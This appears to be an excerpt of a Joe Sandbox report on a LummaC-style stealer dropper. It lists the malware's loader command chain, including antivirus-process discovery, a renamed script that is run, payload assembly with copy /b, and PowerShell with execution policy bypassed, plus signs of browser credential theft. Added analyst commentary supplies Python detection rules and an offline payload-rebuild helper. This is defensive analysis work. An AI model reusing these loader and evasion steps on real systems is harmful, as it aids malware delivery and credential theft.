                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: Designing.com.2.dr | String found in binary or memory: https://www.globalsign.com/repository/0
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Setup.exe | String found in binary or memory: https://www.ssl.com/repository0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown | Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.5:49846 version: TLS 1.2
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E1F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E1F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E39FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E14763 GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E01B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\SalvadorJs
Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\LikedBlackberry
Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\WallEnds
Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Windows\HornUsed
Source: C:\Users\user\Desktop\Setup.exe | Code functions: 0_2_0040737E, 0_2_00406EFE, 0_2_004079A2, 0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code functions: 12_2_00DC8017, 12_2_00DAE1F0, 12_2_00DBE144, 12_2_00DA22AD, 12_2_00DC22A2, 12_2_00DDA26E, 12_2_00DBC624, 12_2_00E2C8A4, 12_2_00DDE87F, 12_2_00DD6ADE, 12_2_00E12A05, 12_2_00E08BFF, 12_2_00DBCD7A, 12_2_00DCCE10, 12_2_00DD7159, 12_2_00DA9240, 12_2_00E35311, 12_2_00DA96E0, 12_2_00DC1704, 12_2_00DC1A76, 12_2_00DC7B8B, 12_2_00DA9B60, 12_2_00DC7DBA, 12_2_00DC1D20, 12_2_00DC1FE7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code functions: 16_2_047915AD, 16_2_04791653
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\124531\Designing.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: String function: 00DC0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: String function: 00DBFD52 appears 40 times
Source: C:\Users\user\Desktop\Setup.exe | Code function: String function: 004062CF appears 58 times
Source: Setup.exe | Static PE information: invalid certificate
Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process created: Commandline size = 4588
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/26@4/3
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E141FA GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E02010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E01A0B AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E13A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Users\user\AppData\Local\Temp\nsj4CF9.tmp
Source: Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Designing.com, 0000000C.00000003.2512726298.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2512632876.00000000042BF000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2487418039.00000000042C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Setup.exe | Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\user\Desktop\Setup.exe
Source: unknown | Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Lt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com z
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
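The process tree above is the whole loader in nine command lines: an extension-less drop renamed to .cmd and run, `tasklist` piped into `findstr` twice to look for security-product processes, `extrac32` used on a file that is not a .cab, `findstr /V` used as a line filter, `copy /b` stitching seven fragments into `z`, a renamed `.com` executable in `%TEMP%` running `z`, and finally `powershell -exec bypass` handed a 4588-byte argument that is not a script at all but a Cloudflare "Suspected phishing site" page (the `atok` value names the path `/int_clp_ldr_sha.txt`). That last line is worth reading closely: the loader fetched its next stage over HTTPS and piped whatever body came back into PowerShell unchecked, so the expected second stage did not execute in this run, and the behaviour Joe Sandbox attributes to LummaC came from the stage running inside Designing.com. The detection pass below is an added example, not part of the Joe Sandbox report; it runs those command lines through a handful of process-creation rules. The `(parent image, image, command line)` event shape is an assumption (Sysmon Event ID 1 and most EDR telemetry carry those three fields), the command lines in `EVENTS` are the report's, and the PowerShell argument is a constructed stand-in for the HTML page.

```python
"""Process-tree rules for the cmd/findstr/extrac32/copy/powershell loader chain.

Added example, not the report's or the sample's code. Event shape
(parent image, image, command line) is an assumption; the command lines
are those listed in the report, the PowerShell argument is constructed.
"""
import re
from dataclasses import dataclass

# Process names the loader greps for with `tasklist | findstr`, taken from
# the two findstr invocations in the report.
AV_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}

# `move X X.cmd & X.cmd`: give a dropped file a script extension and run it.
RENAME_AND_RUN = re.compile(r"\bmove\s+(\S+)\s+\1\.(cmd|bat)\b.*&\s*\1\.\2\b", re.I)
# `copy /b a + b + c out`: three or more fragments stitched into one file.
BINARY_CONCAT = re.compile(r"\bcopy\s+/b\b(?:.*?\+){2,}", re.I)
PS_BYPASS = re.compile(r"-(?:ex|exec|executionpolicy|ep)\s+bypass", re.I)
HTML_LEADER = re.compile(r"<!DOCTYPE\s+html|<html\b", re.I)
LONG_CMDLINE = 2048  # the report records a 4588-byte powershell command line


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def scan_event(parent: str, image: str, cmdline: str) -> list:
    """Apply every rule to one process-creation event; returns its Findings."""
    name, pname, low = _basename(image), _basename(parent), cmdline.lower()
    hits = []
    if name == "findstr.exe" and pname == "cmd.exe":
        found = sorted(n for n in AV_PROCESS_NAMES if n in low)
        if found:
            hits.append(Finding("av_process_discovery", image, ",".join(found)))
    if name == "cmd.exe" and RENAME_AND_RUN.search(cmdline):
        hits.append(Finding("rename_to_cmd_and_execute", image, cmdline[:80]))
    if name == "cmd.exe" and BINARY_CONCAT.search(cmdline):
        hits.append(Finding("binary_fragment_concat", image, cmdline[:80]))
    if name == "extrac32.exe" and "/e" in low.split() and not low.endswith(".cab"):
        hits.append(Finding("extrac32_non_cab_input", image, cmdline))
    if name.endswith(".com") and "\\appdata\\local\\temp\\" in image.lower() \
            and pname == "cmd.exe":
        hits.append(Finding("renamed_interpreter_in_temp", image, cmdline))
    if name == "powershell.exe":
        why = []
        if PS_BYPASS.search(cmdline):
            why.append("exec_bypass")
        if len(cmdline) > LONG_CMDLINE:
            why.append(f"len={len(cmdline)}")
        if HTML_LEADER.search(cmdline):
            why.append("html_as_script")  # fetched body was a web page, not a script
        if why:
            hits.append(Finding("suspicious_powershell", image, ";".join(why)))
    return hits


def scan(events) -> list:
    return [f for ev in events for f in scan_event(*ev)]


def chain_score(findings) -> int:
    """Distinct rules that fired; three or more in one tree is the loader
    pattern rather than an isolated false positive."""
    return len({f.rule for f in findings})


CMD = r"C:\Windows\SysWOW64\cmd.exe"
TMP = r"C:\Users\user\AppData\Local\Temp\124531\Designing.com"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stand-in for the Cloudflare interstitial passed to powershell.
FAKE_HTML = ('<!DOCTYPE html> <html class="no-js" lang="en-US"> <head> '
             '<title>Suspected phishing site | Cloudflare</title>' + ' <p>x</p>' * 300)

EVENTS = [  # command lines as listed in the report
    (r"C:\Users\user\Desktop\Setup.exe", CMD,
     r'"C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd'),
    (CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "opssvc wrsa"'),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe",
     'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'),
    (CMD, r"C:\Windows\SysWOW64\extrac32.exe", "extrac32 /Y /E Lt"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "Heater" Lance'),
    (CMD, CMD, r"cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French"
               r" + ..\Selected + ..\Hormone + ..\Rough z"),
    (CMD, TMP, "Designing.com z"),
    (TMP, PS, "powershell -exec bypass " + FAKE_HTML),
]

# Constructed benign use of the same binaries; the rules must stay quiet here.
BENIGN_EVENTS = [
    (CMD, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    (CMD, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "error" app.log'),
    (CMD, r"C:\Windows\SysWOW64\extrac32.exe", "extrac32 /Y /E setup.cab"),
    (r"C:\Windows\explorer.exe", PS, "powershell Get-Process"),
]
```

`scan(EVENTS)` yields seven findings across six rules; `scan(BENIGN_EVENTS)` yields none. The individual rules are deliberately loose (a lone `extrac32 /E` or a long PowerShell command line is common on admin hosts), so alert on `chain_score` over a process tree rather than on any single hit, and keep the AV name list in sync with whatever the current loaders grep for.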
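Two of the steps in that chain are pure file assembly with built-in tools, and an analyst working from a disk image rather than a sandbox often has the inputs but not the outputs: `findstr /V "Heater" Lance` emits every line of `Lance` that does not contain the marker word (the report shows the command but not where its output is redirected), and `copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z` concatenates seven fragments into the `z` that Designing.com is then launched with. The helper below is an added example, not code from the report or the sample, that re-creates both steps offline and checks the results against the one hash the report gives (the dropped Designing.com). The fragment bytes are constructed (a minimal fake PE header), the marker word is the report's, and findstr's exact treatment of binary input is an assumption noted in the code.

```python
"""Offline re-creation of `findstr /V "<marker>" file` and `copy /b a + b + ... out`.

Added example, not code from the report or the sample. Sample bytes are
constructed; the marker word and the reference SHA-256 are the report's.
"""
import hashlib
import struct

# SHA-256 of the dropped Designing.com as recorded by the sandbox.
DROPPED_DESIGNING_COM_SHA256 = (
    "1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49")


def strip_marker_lines(data: bytes, marker: bytes) -> bytes:
    """Emulate `findstr /V "<marker>"` on a byte stream: a line is everything
    up to and including the next b"\\n"; lines containing the marker are
    dropped, all other bytes pass through untouched. That findstr treats
    arbitrary binary input exactly this way is an assumption."""
    kept, start = [], 0
    while start < len(data):
        nl = data.find(b"\n", start)
        end = len(data) if nl == -1 else nl + 1
        line = data[start:end]
        if marker not in line:
            kept.append(line)
        start = end
    return b"".join(kept)


def concat_fragments(fragments) -> bytes:
    """Emulate `copy /b f1 + f2 + ... out`: ordered byte concatenation."""
    return b"".join(fragments)


def looks_like_pe(data: bytes) -> bool:
    """MZ header whose e_lfanew (offset 0x3C) points at a PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def rebuild(lance: bytes, marker: bytes, fragments, known_sha256: str) -> dict:
    """Run both steps and answer the triage questions: is the filtered file a
    PE, does it match the hash the sandbox recorded, what did `copy /b` produce."""
    interpreter = strip_marker_lines(lance, marker)
    script = concat_fragments(fragments)
    return {
        "interpreter_is_pe": looks_like_pe(interpreter),
        "interpreter_sha256": sha256_hex(interpreter),
        "interpreter_matches_report": sha256_hex(interpreter) == known_sha256.lower(),
        "script_sha256": sha256_hex(script),
        "script_len": len(script),
    }


# Constructed sample data: a fake PE (MZ stub, e_lfanew = 0x40, PE signature)
# hidden between marker lines the way the filter step expects, plus the same
# bytes cut into seven fragments, one per name used in the report's copy /b.
FAKE_PE = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)
           + b"PE\x00\x00" + b"\x00" * 20)
LANCE = b"Heater padding line 1\r\n" + FAKE_PE + b"\r\nHeater padding line 2\r\n"
FRAGMENTS = [FAKE_PE[i:i + 13] for i in range(0, len(FAKE_PE), 13)]
```

On the constructed data the filtered output is a valid PE header (with the trailing CRLF of its line still attached, which is also what the real command leaves behind) and, as expected, does not match the report's hash; run the same two functions over the real `Lance` and the seven fragments recovered from `%TEMP%` and a match on `1300262A...` confirms you have the exact binary the sandbox saw.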
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
